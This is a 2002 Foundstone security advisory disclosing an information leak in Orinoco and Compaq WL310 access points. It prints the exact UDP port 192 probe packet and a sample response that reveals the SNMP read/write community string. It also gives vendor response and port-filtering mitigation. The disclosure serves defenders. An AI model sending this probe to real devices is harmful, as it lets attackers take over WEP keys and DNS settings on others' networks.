Foundstone Labs Advisory - 080902-APIL

Advisory Name:  Information Leakage in Orinoco and Compaq Access Points
 Release Date:  August 9th, 2002
  Application:  Orinoco Residential Gateway and Compaq WL310
    Platforms:  N/A
     Severity:  The ability to display/modify configuration information
      Vendors:  Orinoco (http://www.orinocowireless.com) and
                  Compaq (http://www.compaq.com)
      Authors:  Marshall Beddoe (marshall.beddoe@foundstone.com)
                  Tony Bettini (tony.bettini@foundstone.com)
CVE Candidate:  CAN-2002-0812
    Reference:  http://www.foundstone.com/advisories

Overview:

An information leakage vulnerability exists in Orinoco and Compaq OEM 
access points, disclosing the unique SNMP community string. As a result,

an attacker can query the community string and gain the ability to
change
system configuration including Wired Equivalent Privacy (WEP) keys and 
Domain Name Service (DNS) information.

Detailed Description:

The Compaq WL310 is an OEM Orinoco Residential Gateway access point.
Both the Compaq and Orinoco access points use a unique identification
number
found on the bottom of the access point for configuration through
their management client. This identification string is used as the
default SNMP read/write community string. The community strings appears
to be unchangable, unique, and not easily guessable. By sending a
specific packet to UDP port 192, the access point will return
information including the firmware version and the unique identification
value. The packet returned includes the value of system.sysName.0, which
in the case of the Compaq WL310 and Orinoco Residential Gateway,
includes
the unique identification value. The identification value can then be
used as the SNMP community string to view and modify the configuration.

The probe packet:
"\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

Example probe response:
01 01 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 00 00 00 00 60 1d 20  2e 38 00 00 18 19 10 f8  | .....`. .8......
4f 52 69 4e 4f 43 4f 20  52 47 2d 31 31 30 30 20  | ORiNOCO RG-1100
30 33 39 32 61 30 00 00  00 00 00 00 00 00 00 00  | 0392a0..........
02 8f 24 02 52 47 2d 31  31 30 30 20 56 33 2e 38  | ..$.RG-1100 V3.8
33 20 53 4e 2d 30 32 55  54 30 38 32 33 32 33 34  | 3 SN-02UT0823234
32 20 56 00                                       | 2 V.

system.sysName.0 = "ORiNOCO RG-1100 0392a0"
Community name: 0392a0

Vendor Response:

Both vendors were notified of this issue on July 8th, 2002. According
to Orinoco, "The Residential Gateway line has been discontinued."

Solution:

Employ packet filtering on inbound requests to deny access to ports
192/udp and 161/udp on the access point.

FoundScan has been updated to check for this vulnerability. For more
information on FoundScan, see the Foundstone website:
http://www.foundstone.com

Disclaimer:

The information contained in this advisory is copyright (c) 2002 
Foundstone, Inc. and is believed to be accurate at the time of 
publishing, but no representation of any warranty is given, 
express, or implied as to its accuracy or completeness. In no 
event shall the author or Foundstone be liable for any direct, 
indirect, incidental, special, exemplary or consequential 
damages resulting from the use or misuse of this information.  
This advisory may be redistributed, provided that no fee is 
assigned and that the advisory is not modified in any way.